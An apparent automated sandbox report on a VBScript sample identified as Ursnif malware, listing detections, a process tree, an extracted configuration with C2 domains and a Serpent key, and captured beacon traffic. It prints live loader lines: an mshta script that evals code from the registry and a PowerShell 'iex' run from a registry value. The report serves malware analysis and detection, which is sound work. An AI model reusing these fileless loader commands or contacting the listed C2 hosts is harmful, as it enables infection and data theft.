
Windows Analysis Report start[526268].vbs

Overview

General Information

Sample Name: start[526268].vbs
Analysis ID: 480986
MD5: b0de0a696f7b17724fef5c5e0af2bd1d
SHA1: 3de72b8cae6a84f82e05cae18f48a1a302dbebc3
SHA256: e3a1fb3e932aae628aa08bde31be3b30861fa90ca16db4f81d7989093e1fddbe
Tags: vbs

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5464 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 5832 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 5004 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 3128 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • WmiPrvSE.exe (PID: 5336 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 4088 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 1956 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4216 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4624 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

Malware Configuration

Threatname: Ursnif

{
  "RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=",
  "c2_domain": [
    "art.microsoftsofymicrosoftsoft.at",
    "r23cirt55ysvtdvl.onion",
    "fop.langoonik.com",
    "poi.redhatbabby.at",
    "pop.biopiof.at",
    "l46t3vgvmtx5wxe6.onion",
    "v10.avyanok.com",
    "apr.intoolkom.at",
    "fgx.dangerboy.at"
  ],
  "ip_check_url": [
    "curlmyip.net",
    "ident.me",
    "l2.io/ip",
    "whatismyip.akamai.com"
  ],
  "serpent_key": "rQH4gusjF0tL2dQz",
  "server": "580",
  "sleep_time": "5",
  "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600",
  "time_value": "600",
  "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240",
  "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300",
  "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240",
  "not_use(CRC_BCTIMEOUT)": "10",
  "botnet": "2500",
  "SetWaitableTimer_value": "60"
}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
(11 further memory-dump matches are not listed here)

Unpacked PEs

Source | Rule | Description | Author | Strings
34.3.rundll32.exe.566a4a0.1.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
34.3.rundll32.exe.5718d48.2.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
34.3.rundll32.exe.566a4a0.1.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
34.3.rundll32.exe.5718d48.2.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
34.3.rundll32.exe.56e94a0.3.raw.unpack | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started | Author: Florian Roth | Data:
    Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    CommandLine|base64offset|contains:
    Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
    ParentImage: C:\Windows\System32\mshta.exe
    ParentProcessId: 1956
    ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    ProcessId: 4216
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data:
    Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    CommandLine|base64offset|contains:
    Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
    ParentImage: C:\Windows\System32\mshta.exe
    ParentProcessId: 1956
    ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    ProcessId: 4216
Sigma detected: Mshta Spawning Windows Shell
Source: Process started | Author: Florian Roth | Data:
    Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    CommandLine|base64offset|contains:
    Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
    ParentImage: C:\Windows\System32\mshta.exe
    ParentProcessId: 1956
    ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    ProcessId: 4216
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data:
    Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
    CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
    CommandLine|base64offset|contains: zw
    Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentProcessId: 4216
    ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
    ProcessId: 4624
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data:
    Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    CommandLine|base64offset|contains:
    Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
    ParentImage: C:\Windows\System32\mshta.exe
    ParentProcessId: 1956
    ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    ProcessId: 4216
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132757561457280033.4216.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started | Author: Joe Security | Data:
    Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    CommandLine|base64offset|contains:
    Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
    ParentImage: C:\Windows\System32\mshta.exe
    ParentProcessId: 1956
    ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
    ProcessId: 4216

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif (configuration as listed above under Malware Configuration)
Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: atl.bigbigpoppa.com | Virustotal: Detection: 8%
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 34_2_01203276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,34_2_01203276
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdb | source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdbXP | source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb | source: wscript.exe, 00000000.00000003.391888818.000002CC178CF000.00000004.00000001.sdmp, fum.cpp.0.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdb | source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdbXP | source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49791 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49791 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49792 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49793 -> 185.251.90.253:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49793 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.251.90.253 80
Source: Joe Sandbox View | ASN Name: SPRINTHOSTRU SPRINTHOSTRU
Source: Joe Sandbox View | IP Address: 185.251.90.253 185.251.90.253
Source: global traffic | HTTP traffic detected:
    GET /NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: atl.bigbigpoppa.com
Source: global traffic | HTTP traffic detected:
    GET /JWEVOwMBnh_2FtPS/WMS3RPVZyjTSnTq/9Hxp202Yz5PgJEOrB6/nF_2FNmSa/SQyIRZk5j_2B3OcT7rdM/7npsCxfJSu8JbD_2FiM/y1HBEgDsmQFEPX27nGHHbz/zR0jF_2FnlVo0/Nxk3zALE/ofyPMDXzWjS1IpBinC5Sz4W/cf_2F5pD8G/46Dgl0akFp2cXbFnY/HwtGCbH5Q64m/f9VXk69LnhQ/x_2B8W86eQh4Rn/mNr7OMCC6GA9c9ph_2Bg7/ddhYlIa8YUPQgtGC/8R2fSBf4sQLaQ_2/FLycNJhDT_2FxWMMIH/41wPmVaCG/UdSw_2BuW4yZulffApAL/Gvq14U65qaj/9np83 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: atl.bigbigpoppa.com
Source: global traffic | HTTP traffic detected:
    GET /gO6fEM48Z2VyJYyEaQk/Tlg2ka7bPKYxRb_2B442I_/2FFZLVL8c_2BN/KPEiurg_/2FQFW58y_2BC5_2BoQJsMfC/Z20kSl3bCK/Qe_2BCo_2BI8EhVfz/gaTQA1FJpKmh/Okd_2B3iR1p/U_2F_2F_2BxYfZ/z_2B8obDRzLj_2BvPtXpS/MutYXow3kjfHv8Ne/Tk41k1QbLs08co6/pw6aojLzb_2BsMklC7/1luisc2vx/yYmG1Q6eqChu6qOfd2lR/zgadpa0en2mVI5QE7we/rWllKXh4B6iqFxDAWQqk8G/Oj17QsJan3SWq/MhUPAmuR/Yiolc5JDgbwuOe67l9VgfXi/kgInUUiADdo06Z7N/8 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: atl.bigbigpoppa.com
Source: global traffic | HTTP traffic detected:
    GET /fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
    Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic | HTTP traffic detected:
    POST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
    Content-Length: 2
    Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Fri, 10 Sep 2021 05:02:45 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 146
    Connection: close
    Vary: Accept-Encoding
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: powershell.exe, 00000027.00000002.677979658.0000019D8B650000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000027.00000002.678446802.0000019D8B851000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown | HTTP traffic detected:
    POST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
